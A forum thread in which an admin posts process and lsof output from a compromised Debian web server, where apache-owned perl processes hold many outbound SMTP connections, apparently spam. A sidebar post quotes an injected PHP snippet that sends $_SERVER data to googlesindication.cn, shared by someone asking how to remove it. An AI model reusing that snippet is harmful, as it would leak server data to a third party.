|
|
Sponsored Content
Operating Systems
Linux
Debian
Malicious perl script
Post 302992317 by dadprpus on Thursday 23rd of February 2017 04:32:34 PM
02-23-2017
Here is what support sent me. I'm suppose to do this myself. Yes, someone else got into terminal cause when remotely logged in I saw this last Login: the feb 23 14:59:13 2017 from phrank.aus.us.siteprotect.com
and then this happened:
---------- Post updated at 04:32 PM ---------- Previous update was at 04:21 PM ----------
Also checked every instance pf perl in users folders cgi-bin as well as html folders. None found.
and then this happened:
Code:
top - 13:06:42 up 3 days, 16:16, 1 user, load average: 4.28, 7.87, 9.43 Tasks: 212 total, 2 running, 210 sleeping, 0 stopped, 0 zombie Cpu(s): 15.6%us, 2.5%sy, 2.7%ni, 18.6%id, 60.0%wa, 0.0%hi, 0.7%si, 0.0%st Mem: 1928704k total, 1875564k used, 53140k free, 17392k buffers Swap: 4128764k total, 2257872k used, 1870892k free, 131640k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 4600 apache 20 0 2898m 1.3g 832 D 0.7 70.5 216:41.32 perl 11541 mysql 30 10 793m 50m 4516 S 0.7 2.7 25:14.14 mysqld 764 petra195 30 10 130m 37m 29m S 2.3 2.0 0:01.20 php-cgi 606 petra195 30 10 130m 37m 29m S 0.0 2.0 0:01.08 php-cgi 425 root 20 0 80596 26m 15m S 0.0 1.4 0:00.51 sw-engine 32159 psaadm 30 10 178m 10m 7432 S 0.0 0.6 0:02.80 sw-engine-fpm 12538 tomcat 20 0 647m 10m 712 S 0.0 0.6 2:38.43 java 710 psaadm 30 10 175m 7428 5132 S 0.0 0.4 0:00.04 sw-engine-fpm 3986 root 20 0 86160 6452 1820 S 0.0 0.3 0:18.78 sw-engine 18798 root 30 10 219m 5568 1532 S 1.0 0.3 20:20.56 fail2ban-server 4552 apache 20 0 9108 4540 988 R 16.5 0.2 201:07.83 perl 31173 apache 30 10 49924 4340 2712 S 0.0 0.2 0:00.19 httpd 4334 apache 20 0 11224 4128 1000 S 9.9 0.2 330:41.40 rnd 31111 apache 30 10 49792 4060 2504 S 0.0 0.2 0:00.08 httpd 4599 apache 20 0 8252 4052 988 S 4.6 0.2 211:32.19 perl 709 root 20 0 12604 3696 2872 S 0.0 0.2 0:00.05 sshd 31050 apache 30 10 50880 3688 2164 S 0.0 0.2 0:01.51 httpd 8391 apache 30 10 55936 3636 2304 S 0.0 0.2 0:11.95 httpd [root@dedicated ~]# lsof | grep 4600 perl 4600 apache cwd DIR 253,3 4096 2 / perl 4600 apache rtd DIR 253,3 4096 2 / perl 4600 apache txt REG 253,3 5392 2364698 /usr/bin/perl perl 4600 apache mem REG 253,3 17896 2765063 /lib/libdl-2.12.so perl 4600 apache mem REG 253,3 200092 2765065 /lib/libm-2.12.so perl 4600 apache mem REG 253,3 131260 2763674 /lib/libpthread-2.12.so perl 4600 apache mem REG 253,3 1908112 2758628 /lib/libc-2.12.so perl 4600 apache mem REG 253,3 19864 2626224 /usr/lib/perl5/auto/Socket/Socket.so perl 4600 apache mem REG 253,3 145272 2755460 /lib/ld-2.12.so perl 4600 apache mem REG 253,3 38380 2765062 /lib/libcrypt-2.12.so perl 4600 apache mem REG 253,3 11368 2625445 /usr/lib/perl5/auto/Fcntl/Fcntl.so perl 4600 apache mem REG 253,3 1461680 2491814 /usr/lib/perl5/CORE/libperl.so perl 4600 apache mem REG 253,3 103388 2765077 /lib/libresolv-2.12.so perl 4600 apache mem REG 253,3 105160 2626816 /usr/lib/perl5/auto/POSIX/POSIX.so perl 4600 apache mem REG 253,3 12792 2765083 /lib/libutil-2.12.so perl 4600 apache mem REG 253,3 9604 2764968 /lib/libfreebl3.so perl 4600 apache mem REG 253,3 113912 2765067 /lib/libnsl-2.12.so perl 4600 apache mem REG 253,3 16484 2625464 /usr/lib/perl5/auto/IO/IO.so perl 4600 apache mem REG 253,3 18828 2628558 /usr/lib/perl5/auto/File/Glob/Glob.so perl 4600 apache 0r CHR 1,3 0t0 3975 /dev/null perl 4600 apache 1w CHR 1,3 0t0 3975 /dev/null perl 4600 apache 2w CHR 1,3 0t0 3975 /dev/null perl 4600 apache 3u IPv4 22086043 0t0 UDP *:40988 perl 4600 apache 4u IPv4 22086040 0t0 UDP *:59998 perl 4600 apache 5u IPv4 22086014 0t0 TCP dedicated.soloservices.net:59216->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 6u IPv4 22086050 0t0 TCP dedicated.soloservices.net:55756->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 7u IPv4 22086018 0t0 TCP dedicated.soloservices.net:59220->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 8u IPv4 22086048 0t0 TCP dedicated.soloservices.net:55752->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 9u IPv4 22086019 0t0 TCP dedicated.soloservices.net:59222->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 10u IPv4 22085763 0t0 UDP *:33352 perl 4600 apache 11u sock 0,6 0t0 22084878 can't identify protocol perl 4600 apache 12u sock 0,6 0t0 22085460 can't identify protocol perl 4600 apache 13u IPv4 22086021 0t0 TCP dedicated.soloservices.net:40530->imta-po.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 14u IPv4 22086015 0t0 TCP dedicated.soloservices.net:59218->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 15u IPv4 22086020 0t0 TCP dedicated.soloservices.net:59224->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 16u IPv4 22086022 0t0 TCP dedicated.soloservices.net:40532->imta-po.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 17u IPv4 22086023 0t0 TCP dedicated.soloservices.net:40534->imta-po.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 18u IPv4 22086024 0t0 TCP dedicated.soloservices.net:40536->imta-po.sys.comcast.net:smtp (CLOSE_WAIT) perl 4600 apache 19u IPv4 22086046 0t0 UDP *:60891 perl 4600 apache 20u IPv4 22085979 0t0 TCP dedicated.soloservices.net:48622->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT) perl 4600 apache 21u sock 0,6 0t0 22084905 can't identify protocol perl 4600 apache 22u IPv4 22086049 0t0 TCP dedicated.soloservices.net:55754->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 23u sock 0,6 0t0 22084902 can't identify protocol perl 4600 apache 24u IPv4 22086047 0t0 UDP *:35954 perl 4600 apache 25u IPv4 22086051 0t0 TCP dedicated.soloservices.net:55758->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 26u IPv4 22086044 0t0 UDP *:46542 perl 4600 apache 27u IPv4 22086053 0t0 TCP dedicated.soloservices.net:55762->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 28u IPv4 22086052 0t0 TCP dedicated.soloservices.net:55760->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 29u IPv4 22086054 0t0 TCP dedicated.soloservices.net:55764->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 30u IPv4 22086055 0t0 TCP dedicated.soloservices.net:55766->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT) perl 4600 apache 31u sock 0,6 0t0 22085418 can't identify protocol perl 4600 apache 32u IPv4 22085770 0t0 TCP dedicated.soloservices.net:52386->mta-v1.mail.vip.bf1.yahoo.com:smtp (CLOSE_WAIT) perl 4600 apache 33u IPv4 22086056 0t0 UDP *:44916 perl 4600 apache 35u IPv4 22085769 0t0 TCP dedicated.soloservices.net:52384->mta-v1.mail.vip.bf1.yahoo.com:smtp (CLOSE_WAIT) perl 4600 apache 38u sock 0,6 0t0 22085416 can't identify protocol perl 4600 apache 39u sock 0,6 0t0 22085420 can't identify protocol perl 4600 apache 40u sock 0,6 0t0 22085434 can't identify protocol perl 4600 apache 44u sock 0,6 0t0 22085436 can't identify protocol perl 4600 apache 50u IPv4 22085448 0t0 TCP dedicated.soloservices.net:36992->mx1.hotmail.com:smtp (CLOSE_WAIT) perl 4600 apache 51r FIFO 0,8 0t0 923850 pipe perl 4600 apache 52w FIFO 0,8 0t0 923850 pipe perl 4600 apache 53r FIFO 0,8 0t0 923851 pipe perl 4600 apache 54w FIFO 0,8 0t0 923851 pipe perl 4600 apache 55w REG 253,3 4251 1337727 /var/log/httpd/mod_jk.log perl 4600 apache 56u REG 253,3 1024 1313820 /var/log/httpd/jk-runtime-status.12866 (deleted) perl 4600 apache 57u REG 253,3 1 1313883 /var/log/httpd/jk-runtime-status.12866.lock (deleted) perl 4600 apache 63u IPv4 22085832 0t0 TCP dedicated.soloservices.net:48376->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT) perl 4600 apache 64u IPv4 22085888 0t0 TCP dedicated.soloservices.net:48472->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT) perl 4600 apache 108u IPv4 22085227 0t0 UDP *:56279 qmail-rsp 21406 qmailr txt REG 253,3 14600 1468991 /var/qmail/bin/qmail-rspawn
| Moderator's Comments: | ||
|
---------- Post updated at 04:32 PM ---------- Previous update was at 04:21 PM ----------
Also checked every instance pf perl in users folders cgi-bin as well as html folders. None found.
Last edited by Don Cragun; 02-23-2017 at 05:27 PM.. Reason: Add CODE and ICODE tags.
|
|
7 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
2. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
3. Cybersecurity
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies
4. Shell Programming and Scripting
I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard.
From parent.pl
$input1=123;
$input2=abc;
I tried calling it with
system("/usr/bin/perl child.pl $input1 $input2");
and
`perl... (1 Reply)
Discussion started by: grajp002
1 Replies
5. Shell Programming and Scripting
Hi All,
I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ??
print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">");
print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies
6. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
7. Programming
I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open())
I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies